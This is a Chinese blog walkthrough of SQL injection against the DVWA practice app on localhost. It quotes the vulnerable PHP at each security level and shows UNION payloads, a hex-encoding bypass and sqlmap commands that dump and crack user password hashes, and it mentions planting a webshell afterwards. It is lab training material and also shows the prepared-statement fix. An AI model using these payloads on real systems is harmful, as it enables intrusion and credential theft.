dvwa——sql手动注入和sqlmap自动注入

*爱你&永不变心* 提交于 2020-11-02 13:28:01

手动注入

low:

源码:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

分析源码可以看到,$query语句下直接使用$id拼接sql查询语句,完全没有过滤,导致sql注入的产生。同时也能够理解整个web应该用程序是如何产生html页面的输出的。

利用:

1、 测试是否存在注入点:
输入1',报错You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1,说明存在注入点。
2、爆出数据库:
payload:1' union select 1,database()#
1.jpg
看到两个数据库存在
3、爆出数据表:
payload:1' union select1,table_name from information_schema.tables where table_name='dvwa'#
2
4、爆出字段名:
payload:1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
3
5、得到数据项内容:
payload:1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
4

至此,数据库里的信息已经被下载到本地,注入攻击完成,后续可以用其他方法从sql里添加一个webshell,获取更高的服务器权限。为了叙述方便,其他级别只讲不同之处。

middle:

源码:

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];

	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Display values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

分析源码,使用了mysqli_real_escape_string()函数来过滤危险字符。同时观察前端html页面,使用了下拉菜单来限制选项。但是可以通过burp拦截修改数据包绕过。

mysql_real_escape_string() 函数
转义 SQL 语句中使用的字符串中的特殊字符。 下列字符受影响:
\x00
\n
\r
\
'
"
\x1a
如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

利用:

1、测试是否存在sql漏洞:
拦包,修改如下,可发现存在漏洞
5
2、爆出数据库和数据表的payload不变,因为没有收到转义字符函数的影响,但是第四步爆出字段名的payload中有引号的存在导致不能使用,需要进行绕过

百度一个绕过姿势,发现可以通过16进值绕过。把整个'user'转译为0x7573657273,就可以继续使用第四步的payload:
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
使用结果如下:
6
3、爆出数据项的payload没有引号存在,不受影响可以继续使用

high:

源码:

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);		
}
?>

跟middle级别相比,添加了一句LIMIT 1,以期望限制返回数据的条数,然而实际上可以通过#注释掉。这样,在payload上,基本没有变化。应用在middle级别上的均可以使用。
7

impossle:

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();

		// Make sure only 1 result is returned
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];

			// Feedback for end user
			$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();
?>

分析代码可看到,采用token方式反csrf攻击;同时使用了预编程技术,参数化了$id的值,不再简单拼接sql查询字符串,这使得sql攻击不再有效。

使用sqlmap自动化注入:

在low级别下测试:

(经过测试,在low,middle,high三个级别均可以完成,在此以low为例) 拦包看一下
8

GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

Cookie: security=low; PHPSESSID=ppuucmoddjbj5cg5kmo49g3v8s

Connection: close

Upgrade-Insecure-Requests: 1

看到使用了get方法递交查询参数,同时看到有cookies存在,启动sqlmap时同时带上参数和cookies。payload:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ppuucmoddjbj5cg5kmo49g3v8s" 为叙述方便称为原始命令

9
这是sqlmap的注入过程

10
这是sqlmap给出的探测结论

在原始命令上附加--dbs用来探测当存在的全部database,结果如图
12

在原始命令上附加-D dvwa --tables用以选择名为dvwa的数据库,并爆表名,结果如图
13

在原始命令上附加-D dvwa -T users --columns,用以选择数据库下的users列名和数据类型
14

在原始命令上附加-D dvwa -T users -C user,password --dump,用以选择user和password列爆出其内容。事实上,密码是以MD5形式存在与数据库中的,sqlmap在检测到之后,会自动询问是否进行破解。跟随提示可以选择使用sqlmap内置的彩虹表破解,也可以指定自己的。这里默认进行了破解,显示了原始值

15

到此,已经获得了登陆密码。继续的操作可以是通过sqlmap获取webshell,时间有限,想要进一步了解可以,参考这篇帖子

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!